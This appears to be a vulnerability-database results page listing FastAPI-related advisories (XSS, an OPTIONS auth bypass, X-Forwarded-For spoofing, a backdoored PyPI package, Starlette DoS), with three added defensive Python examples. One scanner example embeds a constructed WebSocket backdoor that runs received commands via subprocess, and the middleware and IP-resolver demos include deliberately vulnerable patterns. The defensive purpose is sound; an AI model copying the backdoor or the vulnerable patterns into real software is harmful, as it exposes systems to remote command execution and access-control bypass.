315 matches found

Positive Technologies · added 2025/06/23 12:00 a.m.

PT-2025-26621 · Visionatrix

Name of the Vulnerable Software and Affected Versions: Visionatrix versions 1.5.0 through 2.5.0. Description: A reflected cross-site scripting (XSS) vulnerability via the "/docs/flows" endpoint allows full takeover of the application and exfiltration of secrets stored in the...

CVSS 8.8 · AI score 5.5 · EPSS 0.00244 · Exploits 0 · References 9

RedhatCVE · added 2025/05/23 7:54 a.m.

CVE-2024-40627

FastAPI OPA is an open-source FastAPI middleware that includes an auth flow. HTTP OPTIONS requests are always allowed by OpaMiddleware, even when they lack authentication, and are passed through directly to the application. OpaMiddleware allows all HTTP OPTIONS requests without evaluating them against...

CVSS 5.8 · AI score 6.8 · EPSS 0.00563 · Exploits 0 · References 1
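
The OPTIONS pass-through described in this entry is a general auth-middleware pitfall, not something specific to OPA. The following is an added example, not fastapi-opa's code: the policy check, the protected route and the token are made up. It puts the vulnerable pattern beside a variant that evaluates every method and answers genuine CORS preflights itself, so an unauthenticated OPTIONS never reaches application code. It is plain ASGI and runs without FastAPI or Starlette installed:

```python
import asyncio

SECRET_BODY = b"secret report"          # constructed sample payload
VALID_TOKEN = b"Bearer example-token"   # constructed sample credential


async def respond(send, status, body, extra_headers=()):
    headers = [(b"content-type", b"text/plain")] + list(extra_headers)
    await send({"type": "http.response.start", "status": status, "headers": headers})
    await send({"type": "http.response.body", "body": body})


async def protected_app(scope, receive, send):
    """Downstream app: answers every method on every path. Many routers also
    dispatch OPTIONS to ordinary handlers, so reaching this unauthenticated is the bug."""
    await respond(send, 200, SECRET_BODY)


def policy_allows(scope):
    """Hypothetical stand-in for the policy query: a bearer-token check."""
    headers = dict(scope.get("headers", []))
    return headers.get(b"authorization") == VALID_TOKEN


class PermissiveOptionsMiddleware:
    """Vulnerable pattern: OPTIONS is never evaluated and is passed straight through."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http" and scope["method"] != "OPTIONS":
            if not policy_allows(scope):
                await respond(send, 401, b"unauthorized")
                return
        await self.app(scope, receive, send)


def is_cors_preflight(scope):
    headers = dict(scope.get("headers", []))
    return b"origin" in headers and b"access-control-request-method" in headers


class StrictMiddleware:
    """Hardened pattern: every HTTP request is evaluated. A genuine CORS preflight
    is answered here with a fixed response; it never reaches the app."""

    def __init__(self, app, allowed_origins=()):
        self.app = app
        self.allowed_origins = set(allowed_origins)

    async def __call__(self, scope, receive, send):
        if scope["type"] != "http":
            await self.app(scope, receive, send)
            return
        if scope["method"] == "OPTIONS" and is_cors_preflight(scope):
            origin = dict(scope["headers"]).get(b"origin", b"")
            if origin in self.allowed_origins:
                await respond(send, 204, b"", [(b"access-control-allow-origin", origin),
                                               (b"access-control-allow-methods", b"GET, POST")])
            else:
                await respond(send, 403, b"origin not allowed")
            return
        if not policy_allows(scope):
            await respond(send, 401, b"unauthorized")
            return
        await self.app(scope, receive, send)


def call(app, method, path="/report", headers=()):
    """Minimal in-process ASGI driver: returns (status, body) without a server."""
    scope = {"type": "http", "method": method, "path": path,
             "headers": [(k.lower().encode(), v.encode()) for k, v in headers]}
    sent = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    asyncio.run(app(scope, receive, send))
    status = sent[0]["status"]
    body = b"".join(m.get("body", b"") for m in sent[1:])
    return status, body


if __name__ == "__main__":
    vuln = PermissiveOptionsMiddleware(protected_app)
    print("vulnerable GET     ->", call(vuln, "GET"))      # (401, b'unauthorized')
    print("vulnerable OPTIONS ->", call(vuln, "OPTIONS"))  # (200, b'secret report')
    strict = StrictMiddleware(protected_app, allowed_origins=[b"https://app.example"])
    print("strict OPTIONS     ->", call(strict, "OPTIONS"))  # (401, b'unauthorized')
```

Running it shows the vulnerable middleware returning the protected body for OPTIONS while refusing GET. Answering preflights inside the middleware is what closes the hole: the only OPTIONS requests that are allowed through without credentials are the ones the middleware itself terminates, with a fixed response and an origin allowlist, so the application never sees an unauthenticated request of any method.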

RedhatCVE · added 2025/05/23 7:44 a.m.

CVE-2024-42816

A cross-site scripting (XSS) vulnerability in the Create Product function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter...

CVSS 6.1 · AI score 5.7 · EPSS 0.0027 · Exploits 0 · References 1

RedhatCVE · added 2025/05/23 7:44 a.m.

CVE-2024-42818

A cross-site scripting (XSS) vulnerability in the Config-Create function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter...

CVSS 6.1 · AI score 5.7 · EPSS 0.0027 · Exploits 0 · References 1

RedhatCVE · added 2025/05/08 3:15 p.m.

CVE-2025-46814

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...

CVSS 3.4 · AI score 7.4 · EPSS 0.0029 · Exploits 1 · References 1

Snyk · added 2025/05/06 3:45 p.m.

Use of Less Trusted Source

Overview: fastapi-guard is a security library for FastAPI to control IPs and more. Affected versions of this package are vulnerable to Use of Less Trusted Source via manipulation of the X-Forwarded-For header. An attacker can inject arbitrary IP addresses into the request by manipulating this...

CVSS 7.5 · AI score 7 · EPSS 0.0029 · Exploits 1 · References 2

NVD · added 2025/05/06 3:16 p.m.

CVE-2025-46814

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...

CVSS 7.5 · EPSS 0.0029 · Exploits 1 · References 2

CVE · added 2025/05/06 2:55 p.m.

CVE-2025-46814

CVE-2025-46814 affects the FastAPI Guard library (pre-2.0.0) and describes an HTTP header injection via the X-Forwarded-For header. The underlying issue allows an attacker to inject arbitrary IP addresses into requests, potentially bypassing IP-based access controls, misleading logs, and imperson...

CVSS 7.5 · AI score 4.3 · EPSS 0.0029 · Exploits 1 · References 2 · Affected Software 1

Vulnrichment · added 2025/05/06 2:55 p.m.

CVE-2025-46814 · FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...

CVSS 3.4 · AI score 7.3 · EPSS 0.0029 · Exploits 1 · References 2

Cvelist · added 2025/05/06 2:55 p.m.

CVE-2025-46814 · FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...

CVSS 3.4 · EPSS 0.0029 · Exploits 1 · References 2

OSV · added 2025/05/06 2:55 p.m.

CVE-2025-46814 · FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation

FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...

CVSS 3.4 · AI score 7.3 · EPSS 0.0029 · Exploits 1 · References 4

CNNVD · added 2025/05/06 12:00 a.m.

fastapi-guard injection vulnerability

fastapi-guard is a security library for FastAPI by Renzo F (individual developer) that provides middleware to control IPs, log requests and detect penetration attempts. An injection vulnerability exists in fastapi-guard versions prior to 2.0.0, which stems from an HTTP header injection vulnerabilit...

CVSS 7.5 · AI score 6.9 · EPSS 0.0029 · Exploits 1 · References 3

Positive Technologies · added 2025/05/06 12:00 a.m.

PT-2025-19983

Name of the Vulnerable Software and Affected Versions: FastAPI Guard versions prior to 2.0.0. Description: An HTTP header injection issue has been identified in FastAPI Guard. By manipulating the X-Forwarded-For header, an attacker can potentially inject arbitrary IP addresses into the request. This...

CVSS 7.5 · AI score 7 · EPSS 0.0029 · Exploits 1 · References 7
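
The CVE-2025-46814 entries above all describe one root cause: deriving the client address from a header that any client can set. The following is an added example, not fastapi-guard's code; the proxy ranges, the blocklist entry and every address are constructed. It shows the naive resolver beside a trusted-proxy resolver that only honours X-Forwarded-For when the TCP peer is one of your own proxies, walks the chain from the right, and refuses malformed headers rather than guessing:

```python
import ipaddress

# Constructed assumptions: the reverse proxies that sit in front of the app, and
# one blocklisted client. Neither value comes from the advisory.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8"),
                   ipaddress.ip_network("192.0.2.10/32")]
BLOCKLIST = {ipaddress.ip_address("203.0.113.77")}


def _is_trusted(ip, trusted):
    return any(ip in net for net in trusted)


def _parse_xff(value):
    """Split an X-Forwarded-For header into IP objects; None if any hop is malformed."""
    hops = []
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        try:
            hops.append(ipaddress.ip_address(part))
        except ValueError:
            return None
    return hops


def client_ip_naive(peer_ip, xff):
    """Vulnerable pattern: trust the left-most X-Forwarded-For entry from anyone.
    The TCP peer may be the attacker, and the header is whatever they typed."""
    hops = _parse_xff(xff) if xff else None
    return hops[0] if hops else ipaddress.ip_address(peer_ip)


def client_ip_trusted(peer_ip, xff, trusted=TRUSTED_PROXIES):
    """Hardened pattern. The header is consulted only when the TCP peer is one of
    our own proxies. The chain is walked right-to-left and the first hop that is
    not a trusted proxy is the client (proxies append the address they saw, so the
    right-hand side is the part the attacker could not forge). Returns None for a
    malformed header so the caller can reject the request instead of guessing."""
    peer = ipaddress.ip_address(peer_ip)
    if not _is_trusted(peer, trusted) or not xff:
        return peer
    hops = _parse_xff(xff)
    if hops is None:
        return None
    for hop in reversed(hops):
        if not _is_trusted(hop, trusted):
            return hop
    return peer  # every hop was one of our proxies; nothing better than the peer


def allowed(resolver, peer_ip, xff):
    """Apply the blocklist to whatever address the resolver picked."""
    ip = resolver(peer_ip, xff)
    return ip is not None and ip not in BLOCKLIST


if __name__ == "__main__":
    # Constructed scenarios: (peer address, X-Forwarded-For as received)
    cases = [
        ("direct, spoofed header", "203.0.113.77", "198.51.100.5"),
        ("via proxy, attacker prefixed a fake hop", "10.0.0.5", "198.51.100.5, 203.0.113.77"),
        ("via proxy, attacker prefixed a proxy address", "10.0.0.5", "10.0.0.9, 203.0.113.77"),
        ("via proxy, honest client", "10.0.0.5", "198.51.100.5"),
        ("via proxy, malformed header", "10.0.0.5", "not-an-ip, 203.0.113.77"),
    ]
    for label, peer, xff in cases:
        print(f"{label:46} naive={client_ip_naive(peer, xff)!s:14} "
              f"trusted={client_ip_trusted(peer, xff)!s:14} "
              f"allowed naive/trusted={allowed(client_ip_naive, peer, xff)}/"
              f"{allowed(client_ip_trusted, peer, xff)}")
```

The first two scenarios are the bypass: the blocklisted address appears in the header's right-most position (or not at all when the attacker connects directly), yet the naive resolver reports the forged left-most entry and lets the request through. The trusted resolver is only as good as its proxy list; if the application is ever exposed without the proxy in front of it, the header is ignored and the real peer is used, which is the safe failure.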

OSV · added 2025/04/30 4:30 p.m.

MAL-2025-191752 · Malicious code in helmet-fastapi (PyPI)

Source: kam193 (c1f805932ecbcd95197e98c6e2336eb773252abf5615fe135076d1848cb90395). The package contains hidden code adding a backdoor: a WebSocket path handler that executes commands sent by an attacker who knows the path. In addition, it add...

AI score 7.3 · Exploits 0 · References 1

OSSF Malicious Packages · added 2025/04/30 4:30 p.m.

Malicious code in helmet-fastapi (PyPI)

Source: kam193 (c1f805932ecbcd95197e98c6e2336eb773252abf5615fe135076d1848cb90395). The package contains hidden code adding a backdoor: a WebSocket path handler that executes commands sent by an attacker who knows the path. In addition, it add...

AI score 7.5 · Exploits 0 · References 1
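
The two helmet-fastapi entries describe a hidden WebSocket handler that executes commands sent by whoever knows its path. As an added example of a supply-chain check, not the OSSF analysis and not the real package's code (both source samples below are constructed to mimic the described pattern), here is an AST scan that flags FastAPI/Starlette-style `.websocket(...)` route handlers whose bodies call command- or code-execution functions. It is meant to be run over a site-packages tree before a freshly installed package is trusted:

```python
import ast
from pathlib import Path

# Constructed sample modelled on the pattern the advisory describes (a WebSocket
# handler that runs whatever it receives). Not the real helmet-fastapi code.
SUSPECT_SOURCE = '''
import subprocess
from fastapi import FastAPI, WebSocket
app = FastAPI()

@app.get("/health")
async def health():
    return {"ok": True}

@app.websocket("/ws/7f3a")
async def _h(ws: WebSocket):
    await ws.accept()
    while True:
        cmd = await ws.receive_text()
        out = subprocess.run(cmd, shell=True, capture_output=True)
        await ws.send_text(out.stdout.decode())
'''

# Constructed benign sample: a WebSocket route that only echoes.
BENIGN_SOURCE = '''
from fastapi import FastAPI, WebSocket
app = FastAPI()

@app.websocket("/ws/echo")
async def echo(ws: WebSocket):
    await ws.accept()
    while True:
        await ws.send_text(await ws.receive_text())
'''

# Calls that turn received data into command or code execution.
EXEC_CALLS = {
    ("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
    ("subprocess", "check_output"), ("os", "system"), ("os", "popen"),
    (None, "exec"), (None, "eval"),
}


def _call_name(call):
    """Return (module, attr) for `mod.attr(...)` or (None, name) for `name(...)`."""
    f = call.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return (None, f.id)
    return None


def _is_websocket_route(dec):
    """Matches decorators such as @app.websocket("/path") or @router.websocket(...)."""
    return (isinstance(dec, ast.Call) and isinstance(dec.func, ast.Attribute)
            and dec.func.attr == "websocket")


def find_command_websockets(source, filename="<module>"):
    """Flag WebSocket route handlers whose body calls one of EXEC_CALLS."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        routes = [d for d in node.decorator_list if _is_websocket_route(d)]
        if not routes:
            continue
        paths = [a.value for d in routes for a in d.args if isinstance(a, ast.Constant)]
        for inner in ast.walk(node):
            if isinstance(inner, ast.Call):
                name = _call_name(inner)
                if name in EXEC_CALLS:
                    findings.append({
                        "file": filename, "handler": node.name, "paths": paths,
                        "call": ".".join(p for p in name if p), "line": inner.lineno,
                    })
    return findings


def scan_tree(root):
    """Scan every .py file under root (for example a site-packages directory)."""
    findings = []
    for path in Path(root).rglob("*.py"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += find_command_websockets(text, str(path))
        except SyntaxError:
            continue  # not parseable as current Python; worth listing separately
    return findings


if __name__ == "__main__":
    for hit in find_command_websockets(SUSPECT_SOURCE, "suspect.py"):
        print(hit)
    print("benign:", find_command_websockets(BENIGN_SOURCE, "benign.py"))
```

This is a heuristic, not a clearance: a package can hide the call behind `getattr`, an aliased import, `importlib`, or an `exec` of a decoded string, and it can register the route through `add_api_websocket_route` rather than a decorator, so extend `EXEC_CALLS` and `_is_websocket_route` to the patterns you care about and treat an empty result as "nothing obvious". Comparing the installed wheel's hash against the one recorded by the advisory source is the more reliable check for this particular package.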

RedhatCVE · added 2025/03/22 12:38 p.m.

CVE-2025-0182

A vulnerability in danswer-ai/danswer version 0.9.0 allows for denial of service through memory exhaustion. The issue arises from the use of a vulnerable version of the starlette package (<=0.49) via fastapi, which was patched in fastapi version 0.115.3. The vulnerability can be exploited by sending...

CVSS 7.5 · AI score 6.9 · EPSS 0.00664 · Exploits 0 · References 1

RedhatCVE · added 2025/03/22 12:23 p.m.

CVE-2024-12868

In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions <=0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...

AI score 6.7 · Exploits 0 · References 3

OSV · added 2025/03/20 12:32 p.m.

GHSA-W466-2WFC-8G58 · Open WebUI has a vulnerable dependency on starlette via fastapi

In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions <=0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...

CVSS 7.5 · AI score 6.8 · EPSS 0.00652 · Exploits 0 · References 4

Github Security Blog · added 2025/03/20 12:32 p.m.

Open WebUI has a vulnerable dependency on starlette via fastapi

In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions <=0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...

CVSS 8.7 · AI score 6.5 · EPSS 0.00652 · Exploits 0 · References 4 · Affected Software 1

NVD · added 2025/03/20 10:15 a.m.

CVE-2025-0182

A vulnerability in danswer-ai/danswer version 0.9.0 allows for denial of service through memory exhaustion. The issue arises from the use of a vulnerable version of the starlette package (<=0.49) via fastapi, which was patched in fastapi version 0.115.3. The vulnerability can be exploited by sending...

CVSS 7.5 · EPSS 0.00664 · Exploits 0 · References 1